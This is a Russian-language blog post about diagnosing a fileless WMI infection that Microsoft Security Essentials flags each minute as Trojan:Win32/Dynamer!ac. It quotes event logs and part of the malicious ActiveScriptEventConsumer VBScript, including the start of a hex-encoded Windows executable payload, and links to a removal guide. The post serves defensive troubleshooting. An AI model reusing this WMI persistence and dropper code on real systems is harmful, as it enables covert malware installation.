Access Point

0
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Win32/Dynamer!ac и Win32/Fuery.A!cl

admin 23.02.2018

Microsoft Security Essentials раз в минуту сообщает о том что действий от пользователя не требуется и он все решил, удаляя файл Tempmf582901854.exe

В просмотре событий \ События управления генерируется огромное кол-во, повторяющихся раз в минуту, событий:

Источник WMI, ID 10
Event filter with query «SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA «Win32_Processor» AND TargetInstance.LoadPercentage > 99″ could not be reactivated in namespace «//./root/CIMV2» because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Источник Microsoft Antimalware, ID 1116
Программа Microsoft Antimalware обнаружила вредоносную или другую потенциально нежелательную программу.
Дополнительные сведения:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Dynamer!ac&threatid=2147684005&enterprise=0
Имя: Trojan:Win32/Dynamer!ac
ИД: 2147684005
Серьезность: Критический
Категория: Троян
Путь: file:_C:\Windows\Tempmf582901854.exe
Исходный объект обнаружения: Локальный компьютер
Тип обнаружения: Конкретный
Источник обнаружения: Защита в режиме реального времени
Пользователь: NT AUTHORITY\система
Имя процесса: C:\Windows\System32\wbem\scrcons.exe
Версия сигнатур: AV: 1.249.1320.0, AS: 1.249.1320.0, NIS: 117.8.0.0
Версия ядра: AM: 1.1.14003.0, NIS: 2.1.13804.0

В моем случае проблема была найдена в WMI а именно
\ROOT\CIMV2:ActiveScriptEventConsumer в экземпляре с именем FishA6C1E422C3C4465CB29520B2C9B418AC находился вредоносный код, который при сохранении в блокнот, Microsoft Security Essentials определил как вирус Trojan:Win32/Fuery.A!cl

Примерно так выглядел скрипт
instance of ActiveScriptEventConsumer
{
Name = «A6C1E422C3C4465CB29520B2C9B418AC»;
ScriptingEngine = «VBScript»;
ScriptText = «On Error Resume Next\nSet fso = CreateObject(\»Scripting.FileSystemObject\»)\nset objProcess = GetObject(\»winmgmts:root\\cimv2:Win32_Process\»)\nhexstr = \»4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a240000000000000054ca76f010ab18a310ab18a310ab18a3f8b412a307ab18a393b716a319ab18a310ab18a313ab18a372b40ba315ab18a310ab19a33bab18a3f8b413a312ab18a35269636810ab18a3000000000000000000000000000000000000000000000000504500004c010300ea751a590000000000000000e0000f010b010600003000000050000000000000ce1100000010000000400000000040000010000000100000040000000000000004000000000000000090000000100000000000000200000000001000001000000000100000100000000000001000000000000000000000001c440000500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
и т.п.

Как удалять
https://www.bleepingcomputer.com/news/security/yeabests-cc-a-fileless-infection-using-wmi-to-hijack-your-browser/ с заголовка How to manually remove the Yeabeasts.cc infection script from WMI

Tagged with: ,

Leave a Comment

Login to your account

Can't remember your Password ?

Register for this site!